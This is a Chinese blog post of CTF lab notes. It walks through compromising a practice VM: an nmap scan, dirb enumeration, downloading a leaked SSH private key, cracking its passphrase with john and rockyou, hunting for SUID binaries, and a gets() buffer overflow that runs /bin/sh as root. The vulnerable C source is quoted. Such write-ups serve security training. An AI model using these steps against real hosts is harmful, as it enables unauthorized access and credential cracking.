CTF 2019-7-26 笔记

最新推荐文章于 2021-10-10 23:10:51 发布
最新推荐文章于 2021-10-10 23:10:51 发布
阅读量258 收藏
点赞数
分类专栏: 读书笔记 文章标签: 私银泄露 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40328085/article/details/97424419
版权

第一步, nmap  -sV 192.168.0.1    扫描 服务信息

        找到已经打开的端口。

第二步, 浏览器 192.168.0.1:31337    探看页面源代码。

        找到可能的隐藏的文件。

第三步, 探测端口信息     dirb http://192.168.0.1:31337/        别忘了最后的"/"

        可以探测到隐藏的文件(浏览不到的文件)

第四步,SSH认证方式 : {'id_rsa','authorized_key','id_rsa_pub'}

     下载 http://192.168.0.1:31337/.ssh/id_rsa

     下载 http://192.168.0.1:31337/.ssh/authorized_key

第五步,  ssh -i  id_rsa 用户名  (其中用户名,可从authorized_key 中获取)

                 chmod  600 id_rsa

                 ssh -i  id_rsa  simon

第六步,  ssh2john id_rsa >rsacrack  

                 zcat  /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack    获取用户密码。

第七步      ssh -i  id_rsa  simon 然后输入第六步中的密码。

                    登录至远程主机。

第八步      切换到    /root目录 

                查看目录(目录权限可能受限)

第九步      find  /    -perm 4000 2 > /dev/null  

                   -perm  4000 表示可以有suid 权限的文件。

                   2>/dev/null 表示标准错误至null

readmessage 与 溢出

readmessage.c  如下:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// You're getting close!   Here's another flag:
//flag2{use_the_source_luke}

int main(int argc, char *argv[]{
    char program[]="/usr/local/sbin/message";
    char buf[20];
    char authorized[]="simon";
    
    printf("what's your name ?\n");
    gets(buf);

//Only compare first five chars to save precious cycles:

if (!strncmp(authorized,buf,5))  {
    printf("Hello %s ! Here is your message:\n\n",buf);
    //This is safe as the user can't mess with the binary location:
    execve(program,null,null);
}else {
    printf("Sorry %s,you're not %s! The Internet Police have been informed of this voilation.\n",buf,authorized);

    exit(EXIT_FAILURE);

   }
}

第十步,执行readmessage,用户名xxxxx

则显示完成  (此步测试一下)

readmessage

What's your name ?

xxxxx

"Sorry xxxxx,you're not Simon!The Internet Police have been informed of this voilation.

第十一步,执行readmessage

readmessage

What's your name ?

Simon

Hello Simon! Here is your message:

Hi Simon, I hope you like our private messaging system

I'm really happy with how it worked out!

If you're interested in how it works,I've left a copy of the source code in my home directory.

-Charlie Root

第十二步:

readmessage

What's your name ?

SimonAAAAAAAAAAAAAAA/bin/sh

   ( 其中 Simon   五字符, A共有15个, 一共占 20字符,后面即溢出至program去了。

Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message:

#

至此溢出完成,已跳转为root用户。

 

 

 

 

 

早睡男
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NewStarCTF 公开赛赛道 week5|web wp
m0_64815693的博客
10-23 2732
NewStarCTF 公开赛赛道 第五周 web wp
ctf训练营 包罗万象
追寻千里的博客
04-03 3254
ctf1.图片里的英语 一恒河沙中有三千世界,一张图里也可以有很多东西。 不多说了,答案是这个图片包含的那句英文的所有单词的首字母。 首字母中的首字母要大写,答案格式是wctf{一坨首字母} 加油吧少年!看好你哦~ 题解:他一说图片里有很多东西,我就。。。。。。了。首先想到的就是图种。试了一下,果真解出来一张新图。再加上我看过《大笑江湖》,所以,理所当然的解出来了。May the for
包罗万象
faintman10
11-24 303
包罗万象
SSH-私密泄露(详)
qq_53030229的博客
10-10 513
我在网上找到的,资源地址,就在前几分钟内有网盘链接,博主比较懒,你们自己动手吧。 SSH-私密泄露前言一、确保攻击机和虚拟机在同一网段二、使用步骤1.引入库2.读入数据 前言 最近一点也不想学习,写篇文章激励一下自己,加油ヾ(◍°∇°◍)ノ゙! 一、确保攻击机和虚拟机在同一网段 两台虚拟机都需要设置,进行网络设置才可以让攻击机能够在同一局域网下搜索到靶机 二、使用步骤 1.引入库 代码如下(示例): 2.读入数据 代码如下(示例): ...
CTF题目记录2(图片隐写)
kkzzjx
05-15 3587
网上找了一个图片隐写的练习,故记录一下 题目1 png图片–LSB隐写 习惯性要先查看属性–没收获 然后stegsolve 我当然是用data extract查看了各个通道的最后两位情况,并保存了几个文件下来试试。。。但是也没有收获 没想到直接浏览最后一位的图像即可找到一些东西 扫了一下获得flag{AppLeU0} 题目2 一张打不开的gif 考察文件格式吧 winhex打开,发现文件头出缺...
网安 重要 ctf -笔记.xlsx
12-02
网安 重要 ctf -笔记
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
CTF-detailed-writeups:非常详细的CTF撰写。 尝试使它对于CTF初学者是可以理解的。 中英双语中文为主
04-05
部分CTF相关笔记也会保存在此repo下 该REPO致力于编写非常详细的文章,以便CTF初学者(包括我在内)可以复制解析过程。本repo致力于写十分详细的写作,让CTF初学者也能复现解题过程。也可能因为懒,部分writeup会写...
ctf-writeups:一些周转基金的个人笔记
04-11
ctf编写 一些周转基金的个人笔记
ctf笔记 杂项 web 密码学基础笔记
最新发布
07-05
ctf笔记 杂项 web 密码学基础笔记
CTF训练集 培训工具
03-16
CTF训练集 CTF培训工具。
rockyou_kali_wordlist
11-19
kali linux operating system default wordlist used to crack passwords
Rock csaw-ctf-2016-quals
qq_41071646的博客
05-17 618
这个题 我进了一些坑 我还以为那个题不对劲 然后 发现有几个误导的函数 我还都给分析了一遍。。。。 然后这个题就很简单了 主要逻辑就是这个 直接 写脚本就好了 #!/usr/bin/python3 # -*- coding:utf-8 -*- s="FLAG23456912365453475897834567" flag="" s_len=len(s) for i in ran...
WhaleCTF 密码学篇~
A_dmin的博客
08-06 3891
WhaleCTF 密码学篇~Death_Chain先有什么检查符号德军密码密钥生成规则很公平 Death_Chain 题目如下,经查找发现是夏多密码~: 直接查表: 夏多密码规则: 最下面四个图表示方向,1表示向上,2表示顺时针转动90度,其他同理 而且要注意所有的变换都要以原图为准,而不是根据上一次变换而变换 解得flag为:flag{FLAGISHELPMEOUTPLEASE} 先有什么 ...
SSH服务的渗透测试
小锤队长的博客
10-05 3289
目录 一,ssh私钥泄露 充电站: 二,ssh 服务测试(暴力破解) 充电站: 一,ssh私钥泄露 靶场:192.168.11.166 1,信息嗅探 对于一个给定的ip得知的靶场机器,我们需要用对其进行扫描,探测开放的服务。(渗透其实是针对服务的漏洞进行探测,然后对应的数据包发送,获取机器的最高权限) nmap -sV 192.168.11.166 //挖掘开放服务...
CTF-SSH私钥泄露
qq_39056867的博客
10-18 1067
CTF-SSH私密泄露 实验环境 运行在Oracle VM VirtulBox上的靶场:192.168.88.142 Kali攻击机:192.168.88.143 实验内容 对于只是给定一个对应IP地址的靶场机器,我们需要用对其进行扫描,探测开放的服务,使用命令nmap -sV IP对靶机进行扫描,探测开放的服务: ...
CTF--Fcrackzip解题
qq_40730029的博客
04-28 1011
仅对CTF部分题目有效(对.zip文件) 在kali里安装fcrackzip apt-get install fcrackzip 安装好之后在wordlists里会有一个rockyou.txt.gz文件,将该文件解压后如下图 gzip -d rockyou.txt.gz 将压缩包暴力破解得到密码 fcrackzip -D -u -p /usr/share/wordlists/rockyou....
ctf解题--当眼花的时候,会显示两张图(隐写)
qq_36791003的博客
08-07 6937
题目 不信? 你试试 解题链接: http://ctf5.shiyanbar.com/stega/final.png 解题 下载图片 wget http://ctf5.shiyanbar.com/stega/final.png kali自带binwalk binwalk final.png 发现从1922524开始偏移 用dd命令进行分离 分离后得图片...
04.实验吧CTF实战之WEB渗透和隐写术解密1
08-03
"网络安全自学篇, CTF实战, WEB渗透, 隐写术, Chrome浏览器, Jother编码, BurpSuite, SQLMAP, Fiddler" 在网络安全领域,尤其是对于初学者来说,了解并实践CTF(Capture The Flag)实战是一种很好的学习方式。"04....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值